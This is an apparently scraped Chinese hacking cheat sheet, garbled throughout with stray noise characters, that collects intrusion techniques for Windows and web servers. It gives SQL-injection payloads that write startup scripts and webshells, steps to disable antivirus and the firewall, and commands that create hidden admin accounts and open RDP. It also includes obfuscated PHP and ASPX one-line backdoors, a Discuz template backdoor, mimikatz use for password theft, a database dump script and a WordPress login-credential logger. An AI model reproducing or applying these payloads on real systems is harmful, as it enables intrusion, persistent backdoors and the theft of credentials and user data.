( t- B# B7 a) M$ A( m1 r' i$ Ninsert into a values ("set wshshell=createobject (""wscript.shell"") " );' V$ }8 Y! |$ `& c' h
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
8 b3 D; O' @, q# B% r, {# n6 rinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " ); S8 s4 C' j: {0 V3 D
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";3 B* H* d7 Y# C( j$ ]1 W
drop table a;# x% V0 K, K l. T5 I- M5 W7 g( o# l# [
% ^$ ^. l7 G+ ?/ a& B; e8 v
英文版本:
" S: Q; v, T" N+ g' ]0 j0 P8 Z7 g. f2 l% }: ~9 R& f/ ?
use test;
" K) y5 ~$ j$ Q5 e/ V9 C7 Mcreate table a (cmd text);0 Q& R& C4 ^4 k" y$ G& K
insert into a values ("set wshshell=createobject (""wscript.shell"") " );) j( {! B6 D. {1 O
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );) r! |3 D' E ]1 j1 U
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
6 O" X' f: L3 ]0 P7 J' D0 `( J4 xselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";2 V, U4 _+ k4 \' c5 X
drop table a;$ \% G7 _" U7 d2 h2 K
, n- y1 s2 P, S7 Mcreate table a (cmd BLOB);
$ n# G' T2 E8 F: Cinsert into a values (CONVERT(木马的16进制代码,CHAR));
) P7 o9 p( G, vselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'2 @1 Y% F0 |# R1 p
drop table a;* W* p5 d4 ^. {- `
7 I1 @4 Q: g5 G0 h
记录一下怎么处理变态诺顿
7 u) U8 |3 j z7 k9 H查看诺顿服务的路径9 v' Q! |6 ~% p# w4 b
sc qc ccSetMgr
9 ]: E/ K& u: [( B1 F. t0 j& V1 ?0 B3 J# o然后设置权限拒绝访问。做绝一点。。
$ l& {2 H6 ]& J2 jcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system. B8 E% F, T3 r' A3 T4 M( b' D
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
/ W. e# } r& @& Qcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
; A( C6 w0 J y" n/ Q n! ccacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
& w; q( f! S0 s( j& E: o+ p; `' e1 G& |, ?% z/ c% J. d
然后再重启服务器
/ c! \. q4 @& \9 tiisreset /reboot
* V) V4 `2 V' @7 ~这样就搞定了。。不过完事后。记得恢复权限。。。。
& D9 ^& s3 l0 ?% ~% E& Hcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
0 u% \( e: c$ e! bcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
" I0 x8 O+ h; c+ j" F8 H9 bcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F8 `: i3 `8 S5 B$ \* ] [
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F- }) z; j! n. i8 P6 r
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
" f) j. z% [. G& y; V0 w! k2 H3 [# ?- u# H/ m+ T4 a: ?% m5 X
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
+ A- M1 z) `0 V& D
- u9 e; B: g! z2 X. c, H) Xpostgresql注射的一些东西3 ]3 z) K8 g* e* B+ M/ @
如何获得webshell
3 _0 b+ }# @, {* B7 Fhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); 4 u8 l9 O) r' B5 R& r/ c# [ k
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); " W/ n/ r" i2 U/ r
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
0 B6 J0 H7 e0 H" M如何读文件. C- G$ v: H4 C' o
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
. @4 F$ _$ j% p9 F& Nhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
( ~$ ?: w5 a i8 n! G) n$ Zhttp://127.0.0.1/postgresql.php?id=1;select * from myfile;- S, b( Y4 _ V* W5 ^% a0 h& C
( k* `8 s( \. t9 e; q: p/ H7 \1 J
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
6 ]# v9 k* s4 E( H当然,这些的postgresql的数据库版本必须大于8.X4 Z7 P* O: t" a' P$ Z1 k
创建一个system的函数:
. ?5 u2 X% ]8 uCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
% L) S% D8 y( G! a
+ Z9 J. j7 j9 F& S, G) @创建一个输出表:2 ^% K* s# M+ K2 i1 h
CREATE TABLE stdout(id serial, system_out text)1 a+ f* K6 K6 R5 t
$ k- _& `* G$ p& R4 _! ^, H- b( M
执行shell,输出到输出表内:
' B! Q5 d4 [* M/ {+ O xSELECT system('uname -a > /tmp/test')+ A+ l1 b% {1 Y' v: X6 F+ A
6 K8 E4 f2 C2 }/ e Wcopy 输出的内容到表里面;2 q4 i9 k \9 t" y% \
COPY stdout(system_out) FROM '/tmp/test'. B2 V" u9 l; b9 g2 y6 o
; p$ R/ _, H0 V, F
从输出表内读取执行后的回显,判断是否执行成功
- ^: N( q% B% h9 o+ ^7 |* J. h& U. b& g/ I5 Y8 k7 t: [
SELECT system_out FROM stdout; I5 ?. i+ ?4 K' x9 b0 a' Z" E1 v
下面是测试例子4 T& K$ n: d9 b0 G4 y
/ a# v3 A+ I) d1 `. i" K2 o% O3 z- E/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
f5 F2 F d8 C3 u6 Z3 W+ { B1 l8 t7 b! x- Z/ L: H1 C e- }/ M
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
* o+ W1 y) |5 T0 T$ Q$ dSTRICT --
! M, q; _! I' O7 s- T- D
+ r G4 S: G& X$ D/store.php?id=1; SELECT system('uname -a > /tmp/test') --
- h' Q: |) Z( L9 _. y1 ]$ s
) q+ I' T5 o( E; i& w+ d; |/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
+ d ]3 o1 y; _5 T+ ^* x1 s5 F' w* O3 E$ Q( }* }; Q& D* ?
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
* R' y7 e1 p/ E, z! @1 j1 Nnet stop sharedaccess stop the default firewall
o! Q# s0 `0 G' o/ |netsh firewall show show/config default firewall8 G/ i. ? G2 s8 e
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
2 `/ w _9 D1 u. {( S( o! t: Znetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall( M x s) U* I2 R! ^4 k, Z) N6 S
修改3389端口方法(修改后不易被扫出)9 |- B& d# |9 B# Q/ s% s1 F
修改服务器端的端口设置,注册表有2个地方需要修改0 i1 w# {6 q3 ~
% F4 j* H2 C! D, H+ J$ j[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]5 h: b) c. o! y6 h. I R* V9 h7 ?7 P
PortNumber值,默认是3389,修改成所希望的端口,比如6000
E. Y- l& s C, l) G2 [( ]. N
7 s* N7 w: N9 f7 s! T# v: g" `0 N3 B第二个地方:( K7 @/ j4 V2 _ l W( S6 `+ s. w' b
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
$ K ^, m9 r+ wPortNumber值,默认是3389,修改成所希望的端口,比如6000
* h( j5 e7 N/ }3 N* c7 ^$ A0 W
" t3 P2 L$ p, L" b" W2 T3 M现在这样就可以了。重启系统就可以了, R% Y3 l4 D4 `0 p* B
' ` l, }$ e1 C+ L3 G查看3389远程登录的脚本
4 x+ m5 C' ~- A; t- q/ f! D' Y保存为一个bat文件
' x/ \: `5 d1 zdate /t >>D:\sec\TSlog\ts.log; j6 y. t9 W: e0 c
time /t >>D:\sec\TSlog\ts.log( i$ T, x( X& F, L
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log* D: m/ C% ?) c
start Explorer
( h; d8 O c( K7 Y# U
' P1 C9 e* X* S! l$ Y5 n8 Qmstsc的参数:
% R9 S0 y" d8 d# ]7 S; l, G% q7 V' o8 P1 z
远程桌面连接/ j, [+ ]. M, n7 F$ f
& Z/ v, u- H1 S4 X S; u& Q- m
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]; G* ?2 ~8 l3 y9 y+ G7 X
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?& q- V B# m/ O
/ k) K% ?: Z1 S- b! _# D' g
<Connection File> -- 指定连接的 .rdp 文件的名称。
$ @- O2 l2 [( ^; P1 H# R: v8 ~
7 B2 H3 e% M) q# a E8 O/v:<server[:port]> -- 指定要连接到的终端服务器。. _8 o0 {0 n, G& d$ w
6 l l6 q: N1 k7 R/console -- 连接到服务器的控制台会话。
9 v) _$ r% I; [% \2 w0 I6 ?2 e2 g3 q
/f -- 以全屏模式启动客户端。: S( f6 q. J' r7 f2 O7 E/ Y6 m3 e A
& I: W0 ~9 a, f: b h6 F9 G/w:<width> -- 指定远程桌面屏幕的宽度。
3 b, v1 @) U. x
1 K/ c1 c1 E7 h0 R c' ~: ^/h:<height> -- 指定远程桌面屏幕的高度。1 W6 U# W% T. K; V. T% K2 P
* ^8 X# F& Z) z7 }9 n6 j/edit -- 打开指定的 .rdp 文件来编辑。% W1 q: t7 D! g' C1 Z. W* t+ W
2 l; P- c) @. W+ X# `$ G/migrate -- 将客户端连接管理器创建的旧版
( f$ L: F5 X3 R# b连接文件迁移到新的 .rdp 连接文件。
3 S. ^2 \9 w; M- k" N" M5 G
6 I: l0 H; H# x9 {: Q* U E3 S7 I
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就" k" V3 ?: f$ M8 `
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
2 L" Z' w; j7 c& m+ _' ^# X+ Y
. @4 z8 u D0 D4 S" D命令行下开启3389
/ y: S4 A# b L3 p, k, `: [net user asp.net aspnet /add D e6 H) f1 _6 ?. Y% B) l) i
net localgroup Administrators asp.net /add l% E3 {5 t+ ^ P0 y% |& v7 ~- L$ f
net localgroup "Remote Desktop Users" asp.net /add
( {3 u5 q/ l3 t/ J! P/ Tattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
1 H: K4 h0 }) ~echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0' ?0 s8 B2 R0 w: j H# I9 F
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
9 Y/ R$ r0 B( F$ lecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
: |) F$ R7 h) } L! A( P: w) jsc config rasman start= auto
# k$ E& `. Y Gsc config remoteaccess start= auto# F1 z8 P+ w- s: @" D
net start rasman
& e% w) {1 N) N+ f/ f' l( ~) Tnet start remoteaccess
5 J& X& [5 T- x& Z* {Media; Y- w# c# g+ G7 t7 N' j
<form id="frmUpload" enctype="multipart/form-data". s8 G' T% [9 e( H' U' b, L+ q
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>6 f; q- t1 V: w+ c' P& F5 R
<input type="file" name="NewFile" size="50"><br>. @* E* K+ o+ I" @& @* H* _3 t
<input id="btnUpload" type="submit" value="Upload">7 U, S% j: b7 _* L
</form>
+ T' z& V$ X, U# I: G/ `) t! }/ ?. p9 D' q
control userpasswords2 查看用户的密码+ h8 }3 v$ d' |' t
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径6 L1 |; z, q( N' T3 W$ r3 E
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
9 ^4 L( F2 {" s3 z2 I) y9 s' `% w+ X W H3 X
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:% r# ^6 C* f* I2 T2 i* J9 n' g
测试1: j$ E; h6 X' z l* k
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
9 r. y9 F$ S* O" r5 w& Y2 G: f: a. n; J- h% _% G9 x5 J
测试2:
8 i @9 {: v3 z8 p' ~8 {) m5 V. \, s v1 E4 [. f/ q
create table dirs(paths varchar(100),paths1 varchar(100), id int)
+ Y4 p% Q/ O$ i F* ?5 b1 J4 `
) a" Z# g ~. ?* a( @8 |! zdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
3 X/ ^5 i4 M+ m) o& L. B7 r8 f
7 z+ Y) F" K+ E9 |- j# oSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
' }3 C2 S- M5 |8 }2 T& b2 P+ I关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
7 g4 f# M8 @/ y4 q可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
+ [" y d" i, ]8 ?& Qnet stop mcafeeframework
9 P g/ r$ g/ p. b" y( y- |net stop mcshield( O8 h: g% ?4 R# Z/ e$ A d
net stop mcafeeengineservice4 O+ J# O: D. Y2 E) R9 g4 {
net stop mctaskmanager
" P+ e8 u0 ?8 j. B. yhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
( u) v7 n5 l Q; Q! K3 e6 I4 }) q$ {5 P: ^" A' V7 j$ V( ]
VNCDump.zip (4.76 KB, 下载次数: 1)
1 B" i4 h8 H7 x# D0 k4 f; y, I$ P# N密码在线破解http://tools88.com/safe/vnc.php! Y/ H9 A0 S* @2 b/ I2 Q) ~3 r, \ U
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
( [3 B' k( \ B, f" Z. z- s8 q! O: e8 S
exec master..xp_cmdshell 'net user'
P9 G5 I% {5 j; g% }! H5 m4 u4 Cmssql执行命令。
& g; K' W1 p3 Z4 ^# i获取mssql的密码hash查询
0 q9 |9 W- ]: Q% qselect name,password from master.dbo.sysxlogins# c, H3 j, j. s/ b( `% K; z
/ y: q8 c3 l$ m% R
backup log dbName with NO_LOG;
, f8 ^& a9 J$ R/ V. H! obackup log dbName with TRUNCATE_ONLY;
" `: B6 C: C0 v* ~" \# ~8 y! z8 jDBCC SHRINKDATABASE(dbName);" A- `1 R0 {4 I
mssql数据库压缩
) z4 `8 ?8 E5 A% ^* `/ p/ Q! C, T( Y2 f; V
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK. r, s9 ?/ ^' d
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。" @/ V0 T! t9 p$ Y7 i! V" n
( ^/ j+ E* b1 m3 m6 ^% @backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'/ B5 m' p% \& J. ?
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak+ \, A' c1 |. g
, `% x8 V7 q! ?' C8 LDiscuz!nt35渗透要点:3 w8 P8 u" w! k8 {: M, F5 U9 d
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default( P& [) a) I& X4 i# w0 U
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
/ b4 @# W* k/ ^& S' F) ?2 P g(3)保存。
2 W) x0 t! W+ p! E: q/ ?(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass" N, L. g/ g) w" Y' x( L1 r
d:\rar.exe a -r d:\1.rar d:\website\6 h8 i4 W, S4 B9 ?
递归压缩website
& r# D9 E2 e1 ]) R4 q+ P注意rar.exe的路径
2 h! ]3 A9 M3 o6 Y. p% L# b1 ?0 `
! E& W/ N" A- u- |1 } j! d5 h$ r, `# _<?php6 u; y" j& u2 K/ ~1 d5 }
7 i+ g) c& J# \5 A$telok = "0${@eval($_POST[xxoo])}";
7 @4 S& S, U" p& L4 @' j8 x8 h( ^2 u" R
$username = "123456";
5 l, O* [- X- u3 R2 m, J7 B
0 D) W& R: e$ N2 W4 H0 _$userpwd = "123456";
; f1 X) ^1 }3 l% {) s& l5 U
" W" d( t7 p, A) q M$telhao = "123456";
* ]5 n# K; ^/ a' Z9 P8 S/ z [' L+ z. [3 Y* r' R$ {5 r/ ]! T
$telinfo = "123456";
# |, X9 f, z# a$ q/ w: d, y t0 R% }. @
?>
0 ]) [9 X) N& E# lphp一句话未过滤插入一句话木马' x7 O( A" g" G" m
7 U* O* M1 f( W站库分离脱裤技巧
6 Y2 F) V) {& \! Q7 U& kexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
) b* m- k' |/ yexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
! {1 _* X5 L$ _6 k1 Q; V条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
4 u( c" ?2 Y" ~2 }+ S- u7 S这儿利用的是马儿的专家模式(自己写代码)。2 ?/ e$ `; x2 X6 a
ini_set('display_errors', 1);5 q: q2 M0 o8 v1 M* k% w
set_time_limit(0);
# v6 ]: h" @8 f+ herror_reporting(E_ALL);7 ?* E u2 n1 l
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());$ _/ ]1 i/ n0 R. i6 w; c! g
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());& v, [5 ?9 k; H; ~" I; @# B
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
8 i' K6 T7 v- s/ ~# e$i = 0;
1 g0 I/ _# B$ f$tmp = '';
% ~- {7 M0 ^- V3 |" A! ]while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
1 @7 M8 v* E# U$ n1 u; f; ] $i = $i+1;% j/ K( Q) @. i* S
$tmp .= implode("::", $row)."\n";& K5 v% W5 x* |' D0 s( \/ d
if(!($i%500)){//500条写入一个文件
( K% ~: k( ?, e5 o7 o' ]$ ] $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';1 ~1 T* R) i- ^
file_put_contents($filename,$tmp);5 M9 {2 g- q6 v, b
$tmp = '';/ L) ?9 [' d! B4 L
}" V4 p* I: R* k. S, B. X2 ^* A
}
9 m7 e9 f" |% N/ p, Pmysql_free_result($result);) R6 g% s. n. M& I! Z$ p
9 R b, }7 F# l6 j1 K
6 z- A3 F/ ~& w% c
# d9 q. r/ T! b/ w, y0 y//down完后delete
/ L' ?$ N- ^0 q4 x" h5 T7 f: B. d: ~! a3 E. C9 \ ^5 h
$ Y# j' K; R& G
ini_set('display_errors', 1);. e* ?6 O7 I7 R+ ?. i" Y$ [+ F
error_reporting(E_ALL);
$ i# E! v% w+ H7 K( h2 c# N3 e; Y2 ?$i = 0;; q8 c" m8 }8 W6 @4 M
while($i<32) {) i9 D! e% T' u
$i = $i+1;) D& F+ B& j; x2 w, v- T: u
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
, R; n3 d3 J( w: S( E6 _- U unlink($filename);
5 d7 g/ X; _; \: n3 U" P0 s) }}
* m8 E B3 `( y$ yhttprint 收集操作系统指纹
8 z/ `) a( s1 u9 Y. m" c扫描192.168.1.100的所有端口
0 v& F p/ i7 A9 Q% ^9 ]5 pnmap –PN –sT –sV –p0-65535 192.168.1.100
4 V6 w; f( S" w: lhost -t ns www.owasp.org 识别的名称服务器,获取dns信息* a4 S/ U' \' I( v# s) F3 ^
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输7 @7 Q& f1 g; G! w j
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
$ L* B( X. a9 f$ Q* C9 ]5 L3 d" C0 P1 M" U: ?/ X' r5 W/ G6 R
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
8 H& R: W; Z0 ?5 ^3 P0 L1 I) a4 @! f+ N1 T- q* H
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
1 S! q, |* q1 L! W( Z) y; f9 I& o
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x9 w8 g0 y+ L- _! H5 Z# j
7 n: [$ Y- N* _' {, c DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
/ X, i" y x" z3 g4 ^& Q$ A% p1 X7 `0 J, z9 A1 g
http://net-square.com/msnpawn/index.shtml (要求安装)# d; h' j+ \. E: t* x- T' G
, c j" y( i* A" M tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
5 w9 y" `, N) h1 I9 ?0 q8 M. i6 |7 `7 C E" p
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)# T6 a$ q8 j! F, e9 e% e! U
set names gb2312- A3 c) e- u& K' F' c* n
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。2 d* S7 p) \! }9 u3 r
. ?- l+ I1 H, d/ u, a
mysql 密码修改1 G, h4 i9 f, I' ~( f; \9 F
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” ; O1 `+ U: V3 Y) e: h$ w7 E4 y) q
update user set password=PASSWORD('antian365.com') where user='root';
# m& q1 j6 C0 V2 Sflush privileges;
r3 J# Y6 ?0 T% Y% R7 d' C. `高级的PHP一句话木马后门+ o/ t: T# r2 `" Y) i5 \& j5 Z
1 l$ K; ^5 Q- a( }3 P1 q k2 Q入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀$ A3 v$ Z( a W3 ]1 A$ E$ q$ W7 j
; F6 O$ e) N& A* H! v3 I, F9 y
1、
5 L( L, F& ?( q) N: V& M2 g* F' P- |) e; m5 p, {- i
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
' ?( M( l$ |" r2 u' ?' h! _7 L* t" [8 ^! u, B% g/ b' W
$hh("/[discuz]/e",$_POST['h'],"Access");! |2 {+ i' L9 G1 h7 T5 z9 S( P/ l
2 R% R' V. {) s% |//菜刀一句话# e- N' ?6 S3 Y0 `9 y3 @! u
( u. P. ?" p3 { Z* O! W2、 } c; Z( G& h" e
3 i3 y* p8 K; I* h7 W& I$filename=$_GET['xbid'];; s7 A% a7 g0 f: ] V/ I/ e
$ S) o8 W) K! W4 V7 J' H! f, h5 G
include ($filename);
3 B9 u! y( t" i4 r( c
# F6 k- N* t1 k/ A; A//危险的include函数,直接编译任何文件为php格式运行
/ G F q; K) L1 p, R" r& B' F4 ~9 F1 G3 _9 D
3、4 }- H. D0 v5 w* v$ h
M# @1 c- X# ?$ ]$reg="c"."o"."p"."y";6 V7 w4 J$ i A
# U+ L- ]/ U% Y- @0 u
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
) {& n4 ]3 Y6 x+ o4 A
3 W0 V2 y5 \- L0 U3 L7 r6 X2 J//重命名任何文件3 Q* w: F) d0 W6 F; O
2 h4 X8 Q" R1 V2 b5 G4、
+ ?3 ^0 q# p$ X1 O9 |' l6 l" n1 a* U ~ U: ]
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";" ]& m6 s& E/ J
5 X; p+ i$ v9 q4 T( e1 Q
$gzid("/[discuz]/e",$_POST['h'],"Access");
3 {0 d9 t2 x. {0 \+ p+ y' s# B6 W# i6 B) M4 k5 ~# M
//菜刀一句话
5 N& e$ y3 A5 Y9 o5 \3 J% s! [2 s9 B2 p, }" N3 ?) L
5、include ($uid);
- u( R$ Q( N) k& q8 B+ s0 c- s: t7 i) j
//危险的include函数,直接编译任何文件为php格式运行,POST , Z% V+ | d8 O1 }! N' I
; Z3 G: C, O) \, p" l2 ]% ~
( Y. I3 ]: l% f/ @5 [//gif插一句话
& @! d, E5 D, ]# k) V a8 d2 d0 I- q9 s( x
6、典型一句话
% v: O8 n1 e. n7 R. `
' u" `4 O6 S' I: K. J8 E) B5 H程序后门代码& f5 x. C% j. u* D
<?php eval_r($_POST[sb])?>6 H: W* p6 M1 J6 I- x+ D
程序代码& C5 z8 \0 g3 }% {' i
<?php @eval_r($_POST[sb])?>; r0 |& h Q w, {# ~8 k
//容错代码: k/ N3 f; Q& V
程序代码5 _7 n+ j# j1 z2 d# D& V2 s/ g
<?php assert($_POST[sb]);?>& C" W. m5 z3 |0 E/ i1 l2 y
//使用lanker一句话客户端的专家模式执行相关的php语句8 S8 B+ }2 I% W* Y
程序代码2 {) f" [0 K1 t4 G2 S
<?$_POST['sa']($_POST['sb']);?>* m0 {! E7 @8 p* L, |% i& f
程序代码8 d- S* h. Z% F# F! v; X4 M" V
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
& o3 v4 O- ] K9 O* C' H. T程序代码
1 d' e I9 b+ s \<?php9 n& `& S. j% T
@preg_replace("/[email]/e",$_POST['h'],"error");: P; K5 L* ?" B6 |! b$ f- D
?>
' [8 Q' }) w3 l//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
% S: r5 J) ]) F5 F程序代码
0 |. g* f! E) j6 I' `! p4 ]- \<O>h=@eval_r($_POST[c]);</O>
9 b' N* D4 C S7 g q程序代码
' h2 e4 q: x. V+ H( `1 w+ g<script language="php">@eval_r($_POST[sb])</script>
: ^9 K9 x* L2 `$ ^ A- {//绕过<?限制的一句话6 Z+ ~1 Z) @" _& |2 a
1 _+ L" a' ^# R/ b5 [% Q
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip" M0 L4 _4 \/ i
详细用法:
: v6 f* P' G( H( }8 k1、到tools目录。psexec \\127.0.0.1 cmd
6 P7 e. b0 M) K- z2、执行mimikatz: B! t- p2 f4 N+ R% r5 H2 Q, R7 J
3、执行 privilege::debug- g0 z7 L$ k- P9 _1 S' w6 B; Z
4、执行 inject::process lsass.exe sekurlsa.dll0 T* W* E$ L: o' W
5、执行@getLogonPasswords3 c6 E) y$ V" [( c
6、widget就是密码+ R9 O* i- T- n. A- e/ v7 b
7、exit退出,不要直接关闭否则系统会崩溃。
8 G8 Q: o) U2 ~6 }+ e2 x& X, q
q* g, t* n- nhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面
% n/ F& Z! k1 A. Y: r
* b/ I* B m: j( M自动查找系统高危补丁
+ R" \& \+ q/ k, m- L! {6 A4 v/ Fsysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
3 s& ?! ` m# m6 t" r" \
" W2 t- Y% i4 d; `0 }" I突破安全狗的一句话aspx后门9 E4 v; ~6 Y3 m# i+ _
<%@ Page Language="C#" ValidateRequest="false" %>
0 k1 @+ n( l7 ^' w- p<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
/ ]5 w# z6 r: y" C0 s/ U/ V: Swebshell下记录WordPress登陆密码
% _- f/ Q# j$ J4 f" }; ~6 a9 Nwebshell下记录Wordpress登陆密码方便进一步社工
% s" ]$ ?/ E5 Z5 N0 |7 a. m: }在文件wp-login.php中539行处添加:
0 O; m" Q* X% _% T// log password8 W& N) n* f0 D! h
$log_user=$_POST['log']; j C7 g& ~4 s/ e) q1 n( s
$log_pwd=$_POST['pwd'];
; ^" w. |3 M0 R$ I. u6 X. [$log_ip=$_SERVER["REMOTE_ADDR"];
; c! Z& j: i/ f3 O8 Y0 Z3 W$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
p7 W8 V7 A7 g2 M" R, O$ u8 _$txt=$txt.”\r\n”;" w; O" N4 A" B( l$ B, |" Q- Z
if($log_user&&$log_pwd&&$log_ip){) {* f9 _" n$ \& D+ z
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
6 B, i; E0 _/ ?: L z% w; n+ j}- H _* R+ k) y! ^4 s+ i" o9 Q1 [+ C) h
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
3 u& v+ t ]7 A" z" G0 `$ r+ I就是搜索case ‘login’
